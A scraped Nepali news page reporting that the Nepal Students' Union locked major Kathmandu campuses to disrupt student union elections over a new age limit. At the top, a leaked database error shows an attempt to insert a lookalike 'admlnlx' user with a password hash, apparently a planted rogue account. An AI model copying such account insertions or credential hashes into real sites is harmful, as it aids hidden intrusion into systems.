WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdvERjPcfToZzWNoBpgcktbaBfp0pP/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 11:17:54', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
स्ववियु चुनाव विथोल्न नेबिसंघ कस्सियो, राजधानीका प्रमुख क्याम्पसहरुमा तालाबन्दी – Gaule Khabar

स्ववियु चुनाव विथोल्न नेबिसंघ कस्सियो, राजधानीका प्रमुख क्याम्पसहरुमा तालाबन्दी

स्ववियु चुनाव विथोल्न नेबिसंघ कस्सियो, राजधानीका प्रमुख क्याम्पसहरुमा तालाबन्दी

काठमाडौं, माघ १७ –

त्रिभुवन विश्वविद्यालय र त्यस मातहतका आंगिक क्याम्पसहरुमा गर्न लागिएको स्ववियु निर्वाचन विथोल्न सत्तारुढ दलकै भातृ संगठन नेबिसंघ कस्सिकएको छ ।

आगामी फागुन १४ गते निर्वाचन गर्ने तय गरी निर्वाचन कार्यतालिकासमेत प्रकाशित भइसकेको अवस्थामा नेविसंघले राजधानीका प्रमुख क्याम्पसहरुमा तालाबन्दी गरिदिएको छ ।

यो वर्षदेखि स्ववियु निर्वाचनमा उमेर हदबन्दी कायम गरिएपछि नेविसंघ आन्दोलित भएको हो । आठ वर्षदेखि स्ववियु निर्वाचन नभएर बुढो भएका विद्यार्थीहरुले स्ववियुमा उमेर हदको विरोध गरेका छन् ।

यसपटक २८ वर्षे उमेर हद र मिश्रित निर्वाचन प्रणाली अपनाउने निर्णय त्रिभुवन विश्वविद्यालयले गरेको छ । पद्मकन्या, आरआर, ल, पशुपति, त्रिचन्द्र, सरस्वती, पब्लिक युथ र शंकरदेव क्याम्पसमा सोमबार तालाबन्दी गरिएको छ । तालाबन्दीका कारण क्याम्पसको कामकाज प्रभावित भएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका